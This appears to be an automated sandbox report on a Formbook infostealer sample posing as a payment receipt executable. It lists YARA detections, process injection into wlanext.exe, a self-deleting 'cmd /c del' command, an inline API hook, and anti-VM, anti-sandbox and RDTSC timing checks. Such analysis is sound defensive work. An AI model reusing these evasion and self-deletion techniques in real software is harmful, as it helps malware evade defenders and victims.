          Source: 00000001.00000002.261423165.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.490449553.0000000002EB0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.490449553.0000000002EB0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.263189244.0000000000F10000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.263189244.0000000000F10000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.491351261.00000000035F0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.491351261.00000000035F0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.491250685.00000000035C0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.491250685.00000000035C0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.263151938.0000000000EE0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.263151938.0000000000EE0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.233139122.00000000033B9000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.233139122.00000000033B9000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.Final-Payment-Receipt.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.Final-Payment-Receipt.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.Final-Payment-Receipt.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.Final-Payment-Receipt.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: Final-Payment-Receipt.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: classification engine Classification label: mal100.troj.evad.winEXE@7/1@5/3
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Final-Payment-Receipt.exe.log
          Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1132:120:WilError_01
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
          Source: Final-Payment-Receipt.exe ReversingLabs: Detection: 34%
          Source: unknown Process created: C:\Users\user\Desktop\Final-Payment-Receipt.exe 'C:\Users\user\Desktop\Final-Payment-Receipt.exe'
          Source: unknown Process created: C:\Users\user\Desktop\Final-Payment-Receipt.exe C:\Users\user\Desktop\Final-Payment-Receipt.exe
          Source: unknown Process created: C:\Windows\SysWOW64\wlanext.exe C:\Windows\SysWOW64\wlanext.exe
          Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Final-Payment-Receipt.exe'
          Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Process created: C:\Users\user\Desktop\Final-Payment-Receipt.exe C:\Users\user\Desktop\Final-Payment-Receipt.exe
          Source: C:\Windows\SysWOW64\wlanext.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Final-Payment-Receipt.exe'
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: Final-Payment-Receipt.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: Final-Payment-Receipt.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wntdll.pdbUGP source: Final-Payment-Receipt.exe, 00000001.00000002.263431017.00000000014AF000.00000040.00000001.sdmp, wlanext.exe, 00000003.00000002.491446077.00000000036F0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: Final-Payment-Receipt.exe, wlanext.exe
          Source: Binary string: wlanext.pdb source: Final-Payment-Receipt.exe, 00000001.00000002.263288108.0000000001370000.00000040.00000001.sdmp
          Source: Binary string: wlanext.pdbGCTL source: Final-Payment-Receipt.exe, 00000001.00000002.263288108.0000000001370000.00000040.00000001.sdmp
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 0_2_055E556E push eax; ret 0_2_055E556F
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_0041B11C push es; iretd 1_2_0041B11D
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_0040E3C1 pushad ; ret 1_2_0040E3DA
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_0040E417 pushad ; ret 1_2_0040E3DA
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_00417619 pushfd ; ret 1_2_0041761D
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_0041CEC5 push eax; ret 1_2_0041CF18
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_0041CF7C push eax; ret 1_2_0041CF82
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_0041CF12 push eax; ret 1_2_0041CF18
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_0041CF1B push eax; ret 1_2_0041CF82
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_0140D0D1 push ecx; ret 1_2_0140D0E4
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_0376D0D1 push ecx; ret 3_2_0376D0E4
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_02ECDA3E push 00000072h; ret 3_2_02ECDA40
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_02EBE3C1 pushad ; ret 3_2_02EBE3DA
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_02ECB11C push es; iretd 3_2_02ECB11D
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_02ECCEC5 push eax; ret 3_2_02ECCF18
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_02EC7619 pushfd ; ret 3_2_02EC761D
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_02ECCF7C push eax; ret 3_2_02ECCF82
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_02ECCF1B push eax; ret 3_2_02ECCF82
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_02ECCF12 push eax; ret 3_2_02ECCF18
          Source: C:\Windows\SysWOW64\wlanext.exe Code function: 3_2_02EBE417 pushad ; ret 3_2_02EBE3DA
          Source: initial sample Static PE information: section name: .text entropy: 7.8171947974

          Hooking and other Techniques for Hiding and Protection:

          Modifies the prolog of user mode functions (user mode inline hooks)
          Source: explorer.exe User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8E 0xEE 0xEE
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\wlanext.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          Yara detected AntiVM_3
          Source: Yara match File source: 00000000.00000002.232793282.00000000023F7000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000000.00000002.232733869.00000000023B1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match File source: Process Memory Space: Final-Payment-Receipt.exe PID: 1692, type: MEMORY
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
          Source: Final-Payment-Receipt.exe, 00000000.00000002.232793282.00000000023F7000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLL
          Source: Final-Payment-Receipt.exe, 00000000.00000002.232793282.00000000023F7000.00000004.00000001.sdmp Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe RDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\wlanext.exe RDTSC instruction interceptor: First address: 0000000002EB98E4 second address: 0000000002EB98EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\wlanext.exe RDTSC instruction interceptor: First address: 0000000002EB9B5E second address: 0000000002EB9B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_00409A90 rdtsc 1_2_00409A90
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Thread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe TID: 5772 Thread sleep time: -52501s >= -30000s
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe TID: 6088 Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exe TID: 4568 Thread sleep count: 39 > 30
          Source: C:\Windows\explorer.exe TID: 4568 Thread sleep time: -78000s >= -30000s
          Source: C:\Windows\SysWOW64\wlanext.exe TID: 5456 Thread sleep time: -75000s >= -30000s
          Source: C:\Windows\explorer.exe Last function: Thread delayed
          Source: explorer.exe, 00000002.00000000.246034971.000000000891C000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00dRom0
          Source: Final-Payment-Receipt.exe, 00000000.00000002.232793282.00000000023F7000.00000004.00000001.sdmp Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 00000002.00000000.245755606.0000000008270000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000002.00000000.236884381.0000000003710000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: Final-Payment-Receipt.exe, 00000000.00000002.232793282.00000000023F7000.00000004.00000001.sdmp Binary or memory string: vmware
          Source: Final-Payment-Receipt.exe, 00000000.00000002.232793282.00000000023F7000.00000004.00000001.sdmp Binary or memory string: VMware SVGA II|update users set password = @password where user_id = @user_id
          Source: explorer.exe, 00000002.00000002.494413702.0000000003767000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00
          Source: explorer.exe, 00000002.00000000.241386939.00000000053A0000.00000004.00000001.sdmp Binary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}F4
          Source: explorer.exe, 00000002.00000002.490839971.00000000011B3000.00000004.00000020.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
          Source: explorer.exe, 00000002.00000002.499236558.00000000053A0000.00000004.00000001.sdmp Binary or memory string: AF_UNIXa0%SystemRoot%\system32\mswsock.dll-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Vir
          Source: explorer.exe, 00000002.00000000.246079624.00000000089B5000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
          Source: explorer.exe, 00000002.00000000.245755606.0000000008270000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000002.00000002.499263196.00000000053C4000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
          Source: explorer.exe, 00000002.00000000.245755606.0000000008270000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000002.00000000.246079624.00000000089B5000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
          Source: Final-Payment-Receipt.exe, 00000000.00000002.232793282.00000000023F7000.00000004.00000001.sdmp Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
          Source: explorer.exe, 00000002.00000000.245755606.0000000008270000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Process information queried: ProcessInformation
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Process queried: DebugPort
          Source: C:\Windows\SysWOW64\wlanext.exe Process queried: DebugPort
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_00409A90 rdtsc 1_2_00409A90
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_0040ACD0 LdrLoadDll, 1_2_0040ACD0
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe Code function: 1_2_013E513A mov eax, dword ptr fs:[00000030h] 1_2_013E513A
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01474AEF mov eax, dword ptr fs:[00000030h]1_2_01474AEF
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01474AEF mov eax, dword ptr fs:[00000030h]1_2_01474AEF
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01474AEF mov eax, dword ptr fs:[00000030h]1_2_01474AEF
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01474AEF mov eax, dword ptr fs:[00000030h]1_2_01474AEF
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01474AEF mov eax, dword ptr fs:[00000030h]1_2_01474AEF
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01474AEF mov eax, dword ptr fs:[00000030h]1_2_01474AEF
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01474AEF mov eax, dword ptr fs:[00000030h]1_2_01474AEF
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01474AEF mov eax, dword ptr fs:[00000030h]1_2_01474AEF
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01474AEF mov eax, dword ptr fs:[00000030h]1_2_01474AEF
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01474AEF mov eax, dword ptr fs:[00000030h]1_2_01474AEF
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01474AEF mov eax, dword ptr fs:[00000030h]1_2_01474AEF
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01474AEF mov eax, dword ptr fs:[00000030h]1_2_01474AEF
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01474AEF mov eax, dword ptr fs:[00000030h]1_2_01474AEF
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01474AEF mov eax, dword ptr fs:[00000030h]1_2_01474AEF
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013ED294 mov eax, dword ptr fs:[00000030h]1_2_013ED294
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013ED294 mov eax, dword ptr fs:[00000030h]1_2_013ED294
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E2AE4 mov eax, dword ptr fs:[00000030h]1_2_013E2AE4
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E2ACB mov eax, dword ptr fs:[00000030h]1_2_013E2ACB
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01433540 mov eax, dword ptr fs:[00000030h]1_2_01433540
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E4D3B mov eax, dword ptr fs:[00000030h]1_2_013E4D3B
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E4D3B mov eax, dword ptr fs:[00000030h]1_2_013E4D3B
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E4D3B mov eax, dword ptr fs:[00000030h]1_2_013E4D3B
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01463D40 mov eax, dword ptr fs:[00000030h]1_2_01463D40
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013C3D34 mov eax, dword ptr fs:[00000030h]1_2_013C3D34
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013C3D34 mov eax, dword ptr fs:[00000030h]1_2_013C3D34
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013C3D34 mov eax, dword ptr fs:[00000030h]1_2_013C3D34
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013C3D34 mov eax, dword ptr fs:[00000030h]1_2_013C3D34
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013C3D34 mov eax, dword ptr fs:[00000030h]1_2_013C3D34
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013C3D34 mov eax, dword ptr fs:[00000030h]1_2_013C3D34
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013C3D34 mov eax, dword ptr fs:[00000030h]1_2_013C3D34
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013C3D34 mov eax, dword ptr fs:[00000030h]1_2_013C3D34
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013C3D34 mov eax, dword ptr fs:[00000030h]1_2_013C3D34
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013C3D34 mov eax, dword ptr fs:[00000030h]1_2_013C3D34
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013C3D34 mov eax, dword ptr fs:[00000030h]1_2_013C3D34
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013C3D34 mov eax, dword ptr fs:[00000030h]1_2_013C3D34
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013C3D34 mov eax, dword ptr fs:[00000030h]1_2_013C3D34
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013BAD30 mov eax, dword ptr fs:[00000030h]1_2_013BAD30
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013EF527 mov eax, dword ptr fs:[00000030h]1_2_013EF527
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013EF527 mov eax, dword ptr fs:[00000030h]1_2_013EF527
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013EF527 mov eax, dword ptr fs:[00000030h]1_2_013EF527
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DC577 mov eax, dword ptr fs:[00000030h]1_2_013DC577
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DC577 mov eax, dword ptr fs:[00000030h]1_2_013DC577
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013D8D76 mov eax, dword ptr fs:[00000030h]1_2_013D8D76
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013D8D76 mov eax, dword ptr fs:[00000030h]1_2_013D8D76
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013D8D76 mov eax, dword ptr fs:[00000030h]1_2_013D8D76
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013D8D76 mov eax, dword ptr fs:[00000030h]1_2_013D8D76
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013D8D76 mov eax, dword ptr fs:[00000030h]1_2_013D8D76
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013D7D50 mov eax, dword ptr fs:[00000030h]1_2_013D7D50
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_0143A537 mov eax, dword ptr fs:[00000030h]1_2_0143A537
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01488D34 mov eax, dword ptr fs:[00000030h]1_2_01488D34
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F3D43 mov eax, dword ptr fs:[00000030h]1_2_013F3D43
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_0147E539 mov eax, dword ptr fs:[00000030h]1_2_0147E539
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01436DC9 mov eax, dword ptr fs:[00000030h]1_2_01436DC9
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01436DC9 mov eax, dword ptr fs:[00000030h]1_2_01436DC9
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01436DC9 mov eax, dword ptr fs:[00000030h]1_2_01436DC9
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01436DC9 mov ecx, dword ptr fs:[00000030h]1_2_01436DC9
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01436DC9 mov eax, dword ptr fs:[00000030h]1_2_01436DC9
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01436DC9 mov eax, dword ptr fs:[00000030h]1_2_01436DC9
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E1DB5 mov eax, dword ptr fs:[00000030h]1_2_013E1DB5
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E1DB5 mov eax, dword ptr fs:[00000030h]1_2_013E1DB5
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E1DB5 mov eax, dword ptr fs:[00000030h]1_2_013E1DB5
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E35A1 mov eax, dword ptr fs:[00000030h]1_2_013E35A1
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013EFD9B mov eax, dword ptr fs:[00000030h]1_2_013EFD9B
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013EFD9B mov eax, dword ptr fs:[00000030h]1_2_013EFD9B
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_0147FDE2 mov eax, dword ptr fs:[00000030h]1_2_0147FDE2
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_0147FDE2 mov eax, dword ptr fs:[00000030h]1_2_0147FDE2
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_0147FDE2 mov eax, dword ptr fs:[00000030h]1_2_0147FDE2
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_0147FDE2 mov eax, dword ptr fs:[00000030h]1_2_0147FDE2
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013B2D8A mov eax, dword ptr fs:[00000030h]1_2_013B2D8A
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013B2D8A mov eax, dword ptr fs:[00000030h]1_2_013B2D8A
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013B2D8A mov eax, dword ptr fs:[00000030h]1_2_013B2D8A
